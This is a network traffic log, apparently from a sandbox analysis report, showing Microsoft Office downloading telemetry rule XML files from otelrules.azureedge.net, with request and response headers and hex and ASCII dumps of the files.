                                                  2024-11-27 17:10:13 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  125192.168.2.64984313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:13 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:13 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:13 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1393
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                  ETag: "0x8DC582BE39DFC9B"
                                                  x-ms-request-id: fe0e881e-601e-0050-1a3a-402c9c000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171013Z-174f7845968j6t2phC1EWRcfe80000000x8000000000ucuu
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:13 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  126192.168.2.64985013.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:14 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:15 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:14 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1358
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                  ETag: "0x8DC582BE6431446"
                                                  x-ms-request-id: 2a3cc61f-301e-001f-7491-3faa3a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171014Z-174f7845968zgtf6hC1EWRqd8s0000000q5000000000fcqt
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:15 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  127192.168.2.64984913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:14 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:15 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:14 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1395
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                  ETag: "0x8DC582BE017CAD3"
                                                  x-ms-request-id: 6f07c4eb-901e-0029-3066-40274a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171014Z-174f7845968qj8jrhC1EWRh41s0000000x6g000000008c54
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:15 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  128192.168.2.64985113.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:14 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:15 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:15 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1395
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                  ETag: "0x8DC582BDE12A98D"
                                                  x-ms-request-id: 9fc3e736-101e-0046-4391-3f91b0000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171015Z-174f7845968psccphC1EWRuz9s0000000xk00000000033gf
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:15 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  129192.168.2.64985213.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:15 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:16 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:16 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1358
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                  ETag: "0x8DC582BE022ECC5"
                                                  x-ms-request-id: 3452a663-f01e-003c-1f91-3f8cf0000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171016Z-174f7845968zgtf6hC1EWRqd8s0000000q3g00000000nf3h
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:16 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  130192.168.2.64985313.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:15 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:16 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:16 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1389
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                  ETag: "0x8DC582BE10A6BC1"
                                                  x-ms-request-id: 28a36876-101e-0034-3966-4096ff000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171016Z-174f78459684bddphC1EWRbht40000000wzg00000000a01u
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:16 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  131192.168.2.64985513.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:16 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:17 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:17 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1405
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                  ETag: "0x8DC582BE12B5C71"
                                                  x-ms-request-id: fdde8523-d01e-0028-578c-3f7896000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171017Z-174f7845968cdxdrhC1EWRg0en0000000x6g00000000a128
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:17 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  132192.168.2.64985413.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:16 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:17 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:17 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1352
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                  ETag: "0x8DC582BE9DEEE28"
                                                  x-ms-request-id: ee9d1ea0-001e-00a2-4791-3fd4d5000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171017Z-174f7845968pf68xhC1EWRr4h80000000xc000000000qetb
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:17 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  133192.168.2.64985613.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:17 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:17 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:17 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1368
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                  ETag: "0x8DC582BDDC22447"
                                                  x-ms-request-id: 04a8d43b-f01e-0052-4745-409224000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171017Z-174f7845968n2hr8hC1EWR9cag0000000ws000000000u90u
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:17 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  134192.168.2.64985713.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:18 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:18 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:18 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1401
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                  ETag: "0x8DC582BE055B528"
                                                  x-ms-request-id: 086672e8-501e-008f-465a-409054000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171018Z-174f7845968n2hr8hC1EWR9cag0000000wyg000000002s0u
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:18 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  135192.168.2.64985813.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:18 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:18 UTC494INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:18 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1364
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                  ETag: "0x8DC582BE1223606"
                                                  x-ms-request-id: edd19938-c01e-00a2-806f-402327000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171018Z-174f7845968frfdmhC1EWRxxbw0000000x4g00000000txg9
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
